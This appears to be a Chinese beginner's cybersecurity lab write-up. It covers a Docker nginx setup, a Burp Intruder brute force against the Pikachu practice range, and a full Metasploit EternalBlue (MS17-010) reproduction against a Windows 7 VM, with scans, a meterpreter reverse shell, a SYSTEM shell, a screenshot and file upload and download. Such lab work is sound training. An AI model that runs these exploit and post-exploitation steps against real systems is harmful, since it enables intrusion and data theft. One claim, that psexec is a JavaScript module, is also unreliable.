网络安全(初级)(1)
一、使用docker搭建nginx
r# 安装 Docker 和 Docker Compose
root@yy-VMware-Virtual-Platform:~# apt-get install docker.io docker-compose# 验证 Docker 安装成功,显示版本信息
root@yy-VMware-Virtual-Platform:~# docker -v
Docker version 27.5.1, build 27.5.1-0ubuntu3~24.04.2# 创建 Docker 服务配置目录(用于自定义配置)
root@yy-VMware-Virtual-Platform:~# mkdir /etc/systemd/system/docker.service.d# 配置 Docker 代理,使 Docker 能够通过代理服务器访问外网
root@yy-VMware-Virtual-Platform:~# vim /etc/systemd/system/docker.service.d/http-proxy.conf
[Service]
Environment="HTTP_PROXY=http://192.168.1.6:7897" # HTTP 请求代理地址
Environment="HTTPS_PROXY=http://192.168.1.6:7897" # HTTPS 请求代理地址
Environment="NO_PROXY=localhost,127.0.0.1" # 不使用代理的地址列表# 验证代理服务器是否可达(ping 测试)
root@yy-VMware-Virtual-Platform:~# ping 192.168.1.6
PING 192.168.1.6 (192.168.1.6) 56(84) bytes of data.
64 bytes from 192.168.1.6: icmp_seq=1 ttl=128 time=0.570 ms
# ...(省略后续 ping 结果)# 从 Docker Hub 拉取 Nginx 官方镜像(默认使用 latest 标签)
root@yy-VMware-Virtual-Platform:~# docker pull nginx
Using default tag: latest
latest: Pulling from library/nginx
# ...(省略拉取过程输出)
Status: Downloaded newer image for nginx:latest
docker.io/library/nginx:latest# 查看本地已下载的 Docker 镜像
root@yy-VMware-Virtual-Platform:~# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
nginx latest 9592f5595f2b 2 weeks ago 192MB# 以守护进程模式 (-d) 运行 Nginx 容器,并将主机 80 端口映射到容器内的 80 端口
# 注意:此前报错是因为 80 端口被占用,本次成功说明端口冲突已解决
root@yy-VMware-Virtual-Platform:~# docker run -d -p 80:80 9592f5595f2b
c62cb7101ebb28202fd6255423dd95ffcc96094e78da6a6ae28f1c2b5599565f# 查看正在运行的容器,确认 Nginx 容器正常运行
root@yy-VMware-Virtual-Platform:~# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c62cb7101ebb 9592f5595f2b "/docker-entrypoint.…" 4 seconds ago Up 3 seconds 0.0.0.0:80->80/tcp, :::80->80/tcp elated_ardinghelli验证:
二、小皮面板搭建pikachu靶场
1.小皮面板安装
root@yy-VMware-Virtual-Platform:~# sudo wget -O install.sh https://dl.xp.cn/dl/xp/install.sh && sudo bash install.sh2.使用小皮面板配置pikachu
启动服务
查询数据库密码
添加pikachu靶场文件
创建靶场网站
进入pikachu靶场
三、burp使用爆破模块破解pikachu的登陆密码
1.打开内嵌浏览器
2.进入pikachu漏洞练习平台,选择基于表单的暴力破解
3.开启拦截
4.得到拦截的信息
5.将拦截的信息发送到intruder
6.框选出所需要破解的区域
7.导入密码本,开始攻击
8.找出长度不一样的值
9.对应密码则是正确密码
四、msf复现永恒之蓝
kail安装msf
┌──(yy㉿kail)-[~]
└─$ sudo apt install metasploit-framework
[sudo] yy 的密码:
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
metasploit-framework 已经是最新版 (6.3.16-0kali1)。
metasploit-framework 已设置为手动安装。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。┌──(yy㉿kail)-[~]
└─$ sudo msfdb init
[+] Starting database[+] Creating database user 'msf'
为新角色输入的口令:
再输入一遍:
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema┌──(yy㉿kail)-[~]
└─$ msfconsole, ,/ \((__---,,,---__))(_) O O (_)_________\ _ / |\o_o \ M S F | \\ _____ | *||| WW|||||| |||=[ metasploit v6.3.16-dev ]
+ -- --=[ 2315 exploits - 1208 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x
Metasploit Documentation: https://docs.metasploit.com/msf6 >1.关闭win7防火墙
2.分别查看win7和kali中的ip地址
kail
┌──(yy㉿kail)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.211.136 netmask 255.255.255.0 broadcast 192.168.211.255inet6 fe80::20c:29ff:fe44:2c10 prefixlen 64 scopeid 0x20<link>ether 00:0c:29:44:2c:10 txqueuelen 1000 (Ethernet)RX packets 3226 bytes 291263 (284.4 KiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 2826 bytes 288328 (281.5 KiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 12749 bytes 2208926 (2.1 MiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 12749 bytes 2208926 (2.1 MiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
win7
3.用kali中的nmap 扫描网段做主机发现
┌──(yy㉿kail)-[~]
└─$ nmap -sP 192.168.211.0/24 #sP(ping扫描)Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-10 18:44 CST
Nmap scan report for 192.168.211.1 (192.168.211.1)
Host is up (0.00086s latency).
Nmap scan report for 192.168.211.2 (192.168.211.2)
Host is up (0.00078s latency).
Nmap scan report for 192.168.211.135 (192.168.211.135)
Host is up (0.00055s latency).
Nmap scan report for 192.168.211.136 (192.168.211.136)
Host is up (0.000042s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.32 seconds4.用kali中的metasploit(MSF)做主机发现
┌──(yy㉿kail)-[~]
└─$ sudo msfconsole%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%=[ metasploit v6.3.16-dev ]
+ -- --=[ 2315 exploits - 1208 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]Metasploit tip: Use sessions -1 to interact with the
last opened session
Metasploit Documentation: https://docs.metasploit.com/msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.211.0/24
rhosts => 192.168.211.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 50
threads => 50
msf6 auxiliary(scanner/discovery/arp_sweep) > run[+] 192.168.211.1 appears to be up (VMware, Inc.).
[+] 192.168.211.2 appears to be up (VMware, Inc.).
[+] 192.168.211.135 appears to be up (VMware, Inc.).
[+] 192.168.211.2 appears to be up (VMware, Inc.).
[+] 192.168.211.135 appears to be up (VMware, Inc.).
[+] 192.168.211.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed5.端口扫描
(1)nmap -sT 扫描端口
┌──(root㉿kail)-[/home/yy]
└─# nmap -sT 192.168.211.135
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-10 18:54 CST
Nmap scan report for 192.168.211.135 (192.168.211.135)
Host is up (0.00017s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
MAC Address: 00:0C:29:49:B6:45 (VMware)Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds(2)MSF 端口扫描
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.211.135
rhosts => 192.168.211.135
msf6 auxiliary(scanner/portscan/tcp) > run[+] 192.168.211.135: - 192.168.211.135:135 - TCP OPEN
[+] 192.168.211.135: - 192.168.211.135:139 - TCP OPEN
[+] 192.168.211.135: - 192.168.211.135:445 - TCP OPEN
[*] 192.168.211.135: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed6.利用模块
(1)MSF 搜索永恒之蓝的漏洞 输入search ms17-010
msf6 > search ms17-010Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce1. blue就是永恒之蓝的漏洞
2. psexec是可利用的一个javascripe(JS)的一个模块
3. command是运行cmd的
4. 最后一个是探测的模块
(2)利用探测的模块看一下这台win7有没有可能存在漏洞
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show optionsModule options (auxiliary/scanner/smb/smb_ms17_010):Name Current Setting Required Description---- --------------- -------- -----------CHECK_ARCH true no Check for architecture on vulnerable hostsCHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hostsCHECK_PIPE false no Check for named pipe on vulnerable hostsNAMED_PIPES /usr/share/metasploit-framework/data yes List of named pipes to check/wordlists/named_pipes.txtRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The SMB service port (TCP)SMBDomain . no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser no The username to authenticate asTHREADS 1 yes The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.211.135
rhosts => 192.168.211.135
msf6 auxiliary(scanner/smb/smb_ms17_010) > run[+] 192.168.211.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.211.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed扫出来是likely可能存在漏洞
(3)利用永恒之蓝的模块
msf6 exploit(windows/smb/ms17_010_eternalblue) > show optionsModule options (exploit/windows/smb/ms17_010_eternalblue):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS 192.168.184.135 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The target port (TCP)SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server2008 R2, Windows 7, Windows Embedded Standard 7 target machines.SMBPass no (Optional) The password for the specified usernameSMBUser no (Optional) The username to authenticate asVERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008R2, Windows 7, Windows Embedded Standard 7 target machines.VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.Payload options (windows/x64/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.211.136 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic TargetView the full module info with the info, or info -d command.msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.211.135
rhosts => 192.168.211.135
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.211.136:4444
[*] 192.168.211.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.211.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.211.135:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.211.135:445 - The target is vulnerable.
[*] 192.168.211.135:445 - Connecting to target for exploitation.
[+] 192.168.211.135:445 - Connection established for exploitation.
[+] 192.168.211.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.211.135:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.211.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.211.135:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic
[*] 192.168.211.135:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.168.211.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.211.135:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.211.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.211.135:445 - Starting non-paged pool grooming
[+] 192.168.211.135:445 - Sending SMBv2 buffers
[+] 192.168.211.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.211.135:445 - Sending final SMBv2 buffers.
[*] 192.168.211.135:445 - Sending last fragment of exploit packet!
[*] 192.168.211.135:445 - Receiving response from exploit packet
[+] 192.168.211.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.211.135:445 - Sending egg to corrupted connection.
[*] 192.168.211.135:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.211.135
[+] 192.168.211.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.211.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.211.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.211.136:4444 -> 192.168.211.135:49211) at 2025-07-10 19:11:15 +0800成功
7.演示功能
(1)获取cmd
meterpreter > shell
Process 2744 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001C:\Windows\system32>ipconfig
ipconfigWindows IP ConfigurationEthernet adapter ��������:Connection-specific DNS Suffix . : localdomainLink-local IPv6 Address . . . . . : fe80::adbe:371a:f662:9f87%11IPv4 Address. . . . . . . . . . . : 192.168.211.135Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.211.2Tunnel adapter isatap.localdomain:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . : localdomainC:\Windows\system32>whoami
whoami
nt authority\systemC:\Windows\system32>(2)捕获屏幕
meterpreter > screenshot
Screenshot saved to: /home/yy/cgtmahki.jpeg
(3)上传文件
meterpreter > upload /home/yy/msfinstall C://
[*] Uploading : /home/yy/msfinstall -> C://\msfinstall
[*] Completed : /home/yy/msfinstall -> C://\msfinstall
(4)下载文件
meterpreter > download c://1.txt
[*] Downloading: c://1.txt -> /home/yy/1.txt
[*] Completed : c://1.txt -> /home/yy/1.txt
